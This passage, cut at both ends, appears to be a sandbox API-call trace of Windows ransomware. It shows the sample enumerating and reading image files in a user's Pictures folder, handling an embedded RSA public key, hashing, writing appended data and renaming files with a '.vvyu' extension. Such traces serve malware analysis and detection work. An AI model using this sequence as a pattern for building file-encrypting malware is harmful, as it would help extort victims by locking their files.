hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.201] GetCurrentThreadId () returned 0x264 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45940 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.201] GetCurrentThreadId () returned 0x264 [0193.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0193.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41ec0 | out: hHeap=0x6a0000) returned 1 [0193.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.212] WriteFile (in: hFile=0x584, lpBuffer=0x2d47778*, nNumberOfBytesToWrite=0xf4a6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d47778*, lpNumberOfBytesWritten=0x30ffb14*=0xf4a6, lpOverlapped=0x0) returned 1 [0193.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.213] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf4ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.213] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.214] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.215] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.215] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.215] CloseHandle (hObject=0x584) returned 1 [0193.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0193.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d47778 [0193.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0193.217] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\dH_l_Ueln9J1Ttp1P51.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\dh_l_ueln9j1ttp1p51.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\dH_l_Ueln9J1Ttp1P51.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\dh_l_ueln9j1ttp1p51.gif.vvyu")) returned 1 [0193.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.219] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.222] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d0395e0, ftCreationTime.dwHighDateTime=0x1d89f43, ftLastAccessTime.dwLowDateTime=0xf36ef180, ftLastAccessTime.dwHighDateTime=0x1d8a24f, ftLastWriteTime.dwLowDateTime=0xf36ef180, ftLastWriteTime.dwHighDateTime=0x1d8a24f, nFileSizeHigh=0x0, nFileSizeLow=0xe747, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="exU6-Q0h.jpg", cAlternateFileName="")) returned 1 [0193.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.222] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\exU6-Q0h.jpg") returned=".jpg" [0193.222] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\exU6-Q0h.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\exu6-q0h.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.223] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=59207) returned 1 [0193.223] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.226] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe721, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.226] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.228] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.228] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe747, lpOverlapped=0x0) returned 1 [0193.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.229] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.231] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.231] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.231] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.231] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.231] GetLastError () returned 0x0 [0193.231] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.231] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.231] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.231] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.231] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe750) returned 0x2d47778 [0193.232] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ec0 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f08 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 